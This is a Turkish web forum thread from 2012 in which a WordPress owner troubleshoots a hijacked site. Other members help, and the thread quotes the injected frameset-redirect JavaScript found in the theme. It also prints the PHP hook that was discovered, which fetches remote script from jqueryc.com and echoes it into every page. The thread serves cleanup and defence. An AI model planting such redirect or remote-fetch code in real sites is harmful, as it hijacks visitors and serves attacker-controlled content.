Site DNS Hatası veriyor. Lütfen Yardım?

21-11-2012, 19:43:18

#1

ugurgenc

Şimdiye kadar bir şey yoktu. Ve 1 haftadır da sitede hiçbir şey değiştirmedim. Ama siteye girmeyi tüm tarayıcılardan denedim.

Wordpress admin paneline girebiliyorum. Tema değiştirince siteye ulaşılıyor. Ama tema ile bileşenler de değiştiği için hata nerede pek kavrayamadım. Tüm bileşenleri kaldırdım yine olmadı. Tema dosyalarını baştan yükledim olmadı. Normalde çalışıyordu.

Opera Mini'den girmeye çalıştığımdaysa şöyle bir hata veriyor.

Erişmeye çalıştığınız http://www1.yazarcizer.org/?framerequest=1&refurl= adresi şu anda kullanılamıyor. .......

Chrome Ekran Alıntısı:

Opera Mini Ekran Alıntısı:

Şimdiden Teşekkürler
21-11-2012, 23:37:03

#2

~~fearles61~~

Üyeliği durduruldu

Hocam tema ney belki temada eksik dosyalar veya temada eksik birşeyler vardır.Normal temada bir sorun yaratıyormu.
22-11-2012, 18:26:51

#3

ugurgenc

kac aydir ayni temayi kullaniyorum. Ayrica tema dosyalarini bastan yukledim. www1 e yonlendirme var. ama nereden halledecegim bilemiyorum. ayni zamanda, diger temalar da calisiyor.
22-11-2012, 18:38:37

#4

CtrlInformatics

Temadaki header, footer ve index dosyalarını inceleyin. Şifrelenmiş yada yönlendirme yapan meta tag olan bir kod varmı bakın. Hostçunuzdan sitede ve sunucuda malware taraması yapmasını isteyin. Temadaki açığı kullanan bir zararlı yazılım olabilir sunucuda. Aynı zamanda sizde bilgisayarınızı tarayın. Eğer sorun yoksa hostçunuzdan dns ayarlarınızı resetlemesini isteyin. (cPanel Reset DNS). Açtığınız subdomainleri gözden geçirin. Bu işlemlerden biri sanıyorumki sizi çözüme ulaştıracaktır.
22-11-2012, 19:02:38

#5

ugurgenc

reseller kullaniyorum. firmaya soyledim bizle ilgili bir durum yok dediler. yazilimsal sorunlariniz olabilr falan. zaten temayi degistirince duzeliyor. ama header da fuction da her seye baktim. tabii ne arayacagimi bilmeden sadece yonlendirmeyle alakali bir seyler aradim.

kesinlikle tema ile ilgili bir seyde sorun var. garip olan sey de hic birseye dokunmamis olmam.

--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 19:02:38 -->-> Daha önceki mesaj 18:58:56 --

bir de dikkat edilirse browser sitenin acilisinda en basta baslik getiriyor. sonra sacma bir yonlendirme yapiyor. ah bir bulsam o kodu
22-11-2012, 21:39:59

#6

~~emrahaltun~~

Üyeliği durduruldu

Hocam hostunuz Güzelhosting mi? DNS değişimi yapacaklardı. Acaba ondan mı kaynaklanıyor bi sorun isterseniz.
22-11-2012, 22:36:03

#7

CtrlInformatics
Reseller kullansanız bile o serverda başka siteler yokmu? Var.

Serverınızda aynı zamanda botlu bir video sitesi var. Genel olarak bu botlar serverdaki diğer wordpress siteleri enfekte ediyor bazen. Ya açılmıyor yada malware uyarısı veriyor. Olabilir. Neredeyse host firmalarının %80i aynı sorunla boğuşuyor ve kabul etmiyor. Bu seferde şans sizin siteyi bulmuş. Temanızda yada permissionlarda bir açık vardır ve rahatça değiştiriyordur kodları. Siz genede üzerinize düşeni yapıp firmaya bilgi vermişsiniz. Ben hostçu arkadaşın yerinde olsam genede taratırdım serverı belki bir sorun vardır. Kişisel karar genede, karışamam.

Ha illa serverdan olacak diye birşey yok ftpden atılırken dahi virüsleniyor olabilir.

Konuyu dağıtmadan size yönlendirmenin nasıl olduğunu açıklayayım:
```
<html>

<head>

<script type="text/javascript">
StaticRequestInfo={Referer:document.referrer};function EscapeBrowserFrame(){try{if(window.top.location==window.self.location){}else{window.top.location.href=document.location.href}}catch(Error){}}function SetRequestTitle(){document.title=document.domain}requesturl1=document.location.href;function getsubDomain(){thetld="";domainkeyword="";url=requesturl1;url=url.replace(new RegExp(/^\s+/),"");url=url.replace(new RegExp(/\s+$/),"");url=url.replace(new RegExp(/\\/g),"/");url=url.replace(new RegExp(/^http\:\/\/|^https\:\/\/|^ftp\:\/\//i),"");url=url.replace(new RegExp(/^www\./i),"");url=url.replace(new RegExp(/\/(.*)/),"");if(url.match(new RegExp(/\.[a-z]{2,3}\.[a-z]{2}$/i))){thetld=url.replace(new RegExp(/.*(\.[a-z]{2,3}\.[a-z]{2})$/i),"$1");url=url.replace(new RegExp(/(\.[a-z]{2,3}\.[a-z]{2})$/i),"")}else if(url.match(new RegExp(/\.[a-z]{2,4}$/i))){thetld=url.replace(new RegExp(/.*(\.[a-z]{2,4})$/i),"$1");url=url.replace(new RegExp(/(\.[a-z]{2,4})$/i),"")}var a=(url.match(new RegExp(/\./g)))?true:false;if(a==true){domainkeyword=url.replace(new RegExp(/.*\.(.*)$/i),"$1")}else{domainkeyword=url}}getsubDomain();function InitiateFrameRequest(){var a="";var b="";if(window.location.search.indexOf("?")==0){b="&framerequest=1"}else{b="?framerequest=1"}b+="&refurl="+encodeURIComponent(StaticRequestInfo.Referer);a="http://www1."+domainkeyword+thetld+"/?framerequest=1&refurl="+encodeURIComponent(StaticRequestInfo.Referer);document.write("<frameset rows=\"100%,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\"><frame src=\""+a+"\" name=\"landingparent\"><\/frameset>")}SetRequestTitle();EscapeBrowserFrame();
	</script>
	
</head>

<script type="text/javascript">
	InitiateFrameRequest();
</script>

<body>

</body>

</html>
```
Bu kod site adresinize "1" ekleyerek indexinizin görünmesini engelliyor. Kodları bizzat sizin anasayfanızdan aldım. Header.php'ye yerleşmiş. Bulup sildiğinizde sorun ortadan kalkacaktır. Fakat zor bulursunuz çünkü genelde değişken çağırarak geliyor yani başka bir dosyada bu kod. IFRAME virüsünün farklı bir versiyonu. Bukalemun gibi şekil değiştiriyor birçok sitede. Bir ihtimal header.php içersinde saçma bir kod yığını olarak görebilirsiniz genelde altında .ru ile biten bir site bulunur. Bu kodları ve site adresinin daha doğrusu hacklink adresinin olduğu satırları görürseniz silin. Göremezseniz php bilen biri ile değişkenleri tek tek deneyin. Biri kesinlikle bu kodu verecektir. Olurda değişkenin çağırdığı dosya sizin ftpde olmayabilir o zaman hostçunuza bu durumu açıklayın serverdaki açığı kapatsın. Wordfence, WP antivirüs gibi güvenlik eklentileri bu kodu yakalıyacaktır onlarlada tarat siteni ardından online scannerler kullan ve malware kalıntısı varmı bak. Çözülmeyecek bir sorun değil biraz kafa yrmak gerekli ama.

Ek olarak bugün pek çok wordpress siteye bulaştı bu kod. Risk monitörlerimiz öyle diyor yani. Hostçu arkadaşlar dikkatli olsunlar.

Aklıma gelenler şimdilik bunlar. İyi forumlar dilerim...

Ctrl International Ekip 2
22-11-2012, 22:54:21

#8

ugurgenc
CtrlInformatics adlı üyeden alıntı: mesajı görüntüle
Reseller kullansanız bile o serverda başka siteler yokmu? Var.

Serverınızda aynı zamanda botlu bir video sitesi var. Genel olarak bu botlar serverdaki diğer wordpress siteleri enfekte ediyor bazen. Ya açılmıyor yada malware uyarısı veriyor. Olabilir. Neredeyse host firmalarının %80i aynı sorunla boğuşuyor ve kabul etmiyor. Bu seferde şans sizin siteyi bulmuş. Temanızda yada permissionlarda bir açık vardır ve rahatça değiştiriyordur kodları. Siz genede üzerinize düşeni yapıp firmaya bilgi vermişsiniz. Ben hostçu arkadaşın yerinde olsam genede taratırdım serverı belki bir sorun vardır. Kişisel karar genede, karışamam.

Ha illa serverdan olacak diye birşey yok ftpden atılırken dahi virüsleniyor olabilir.

Konuyu dağıtmadan size yönlendirmenin nasıl olduğunu açıklayayım:

<html> <head> <script type="text/javascript"> StaticRequestInfo={Referer:document.referrer};function EscapeBrowserFrame(){try{if(window.top.location==window.self.location){}else{window.top.location.href=document.location.href}}catch(Error){}}function SetRequestTitle(){document.title=document.domain}requesturl1=document.location.href;function getsubDomain(){thetld="";domainkeyword="";url=requesturl1;url=url.replace(new RegExp(/^\s+/),"");url=url.replace(new RegExp(/\s+$/),"");url=url.replace(new RegExp(/\\/g),"/");url=url.replace(new RegExp(/^http\:\/\/|^https\:\/\/|^ftp\:\/\//i),"");url=url.replace(new RegExp(/^www\./i),"");url=url.replace(new RegExp(/\/(.*)/),"");if(url.match(new RegExp(/\.[a-z]{2,3}\.[a-z]{2}$/i))){thetld=url.replace(new RegExp(/.*(\.[a-z]{2,3}\.[a-z]{2})$/i),"$1");url=url.replace(new RegExp(/(\.[a-z]{2,3}\.[a-z]{2})$/i),"")}else if(url.match(new RegExp(/\.[a-z]{2,4}$/i))){thetld=url.replace(new RegExp(/.*(\.[a-z]{2,4})$/i),"$1");url=url.replace(new RegExp(/(\.[a-z]{2,4})$/i),"")}var a=(url.match(new RegExp(/\./g)))?true:false;if(a==true){domainkeyword=url.replace(new RegExp(/.*\.(.*)$/i),"$1")}else{domainkeyword=url}}getsubDomain();function InitiateFrameRequest(){var a="";var b="";if(window.location.search.indexOf("?")==0){b="&framerequest=1"}else{b="?framerequest=1"}b+="&refurl="+encodeURIComponent(StaticRequestInfo.Referer);a="http://www1."+domainkeyword+thetld+"/?framerequest=1&refurl="+encodeURIComponent(StaticRequestInfo.Referer);document.write("<frameset rows=\"100%,*\" frameborder=\"no\" border=\"0\" framespacing=\"0\"><frame src=\""+a+"\" name=\"landingparent\"><\/frameset>")}SetRequestTitle();EscapeBrowserFrame(); </script> </head> <script type="text/javascript"> InitiateFrameRequest(); </script> <body> </body> </html>

Bu kod site adresinize "1" ekleyerek indexinizin görünmesini engelliyor. Kodları bizzat sizin anasayfanızdan aldım. Header.php'ye yerleşmiş. Bulup sildiğinizde sorun ortadan kalkacaktır. Fakat zor bulursunuz çünkü genelde değişken çağırarak geliyor yani başka bir dosyada bu kod. IFRAME virüsünün farklı bir versiyonu. Bukalemun gibi şekil değiştiriyor birçok sitede. Bir ihtimal header.php içersinde saçma bir kod yığını olarak görebilirsiniz genelde altında .ru ile biten bir site bulunur. Bu kodları ve site adresinin daha doğrusu hacklink adresinin olduğu satırları görürseniz silin. Göremezseniz php bilen biri ile değişkenleri tek tek deneyin. Biri kesinlikle bu kodu verecektir. Olurda değişkenin çağırdığı dosya sizin ftpde olmayabilir o zaman hostçunuza bu durumu açıklayın serverdaki açığı kapatsın. Wordfence, WP antivirüs gibi güvenlik eklentileri bu kodu yakalıyacaktır onlarlada tarat siteni ardından online scannerler kullan ve malware kalıntısı varmı bak. Çözülmeyecek bir sorun değil biraz kafa yrmak gerekli ama.

Ek olarak bugün pek çok wordpress siteye bulaştı bu kod. Risk monitörlerimiz öyle diyor yani. Hostçu arkadaşlar dikkatli olsunlar.

Aklıma gelenler şimdilik bunlar. İyi forumlar dilerim...

Ctrl International Ekip 2
sagolun hocam. zamanim oldugunda onerilerinizi tek tek deneyecegim. artik hangisi olursa.

--R10.NET; Flood Engellendi -->-> Yeni yazılan mesaj 22:54:21 -->-> Daha önceki mesaj 22:53:42 --

emrahaltun adlı üyeden alıntı: mesajı görüntüle

Hocam hostunuz Güzelhosting mi? DNS değişimi yapacaklardı. Acaba ondan mı kaynaklanıyor bi sorun isterseniz.

guzel host degil hocam

23-11-2012, 18:09:35

Bugün tekrar aramalara devam edecekken sitenin jqueryc.com diye bir siteye yönlendirildiğini farkettim. Ve kodlarda arayıp buldum site düzeldi.

if (!function_exists('insert_jquery_function')){function insert_jquery_function(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_function');}